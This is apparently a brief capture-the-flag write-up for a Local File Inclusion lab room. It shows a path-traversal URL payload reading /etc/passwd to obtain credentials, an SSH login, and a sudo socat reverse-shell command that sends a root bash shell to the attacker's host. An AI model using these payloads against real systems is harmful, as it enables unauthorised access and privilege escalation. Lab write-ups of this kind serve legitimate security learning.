Local File Inclusion

The Awesome room for basic understanding of Local File Inclusion

This will be a quick write-up, so let’s get started..

ENUMERATION:-

Clearly port 80 and 22 are open, by diving to 80, various articles are there which are worth read..

Okay so.. after navigating (say LFI-attack), some strange query is in the url

?name=lfiattack This indicates that the website is including information from somewhere else directing us up to a Local File Inclusion attack.

Well, LFI-attacks happens when the input is not sanitised properly.

We saw in the nmap results that port 22 is open, so in the url replace name=lfiattack to name=../../../../../etc/passwd

This means to up to the directory and ending up to root directory.

Hit Ctrl+U and you’ll find the content in nice format along with nice credentials in the end!!!! ;-)

Get Back the machine and ssh to falconfeast

Look around and you’ll get your first flag.

PRIVILEGE ESCALATION

By checkinng current sudo privileges, there’s nice socat sudo access :-)

We’ll now setup the connection to the remote machine i.e our machine.

Run this on attacker machine:- socat file:`tty`, raw, echo-0 tcp-listen:1234

and on falcon run this:- sudo socat tcp-connect:<your_ip>:1234 exec:bash,pty,stderr,setsid,sigint,sane

YES!!! got the root access!!, Look around and answer the second question asked.

That’s all for now!!

Until next time,

Stay Humble always!!

— — — — — — — — — — — — — — -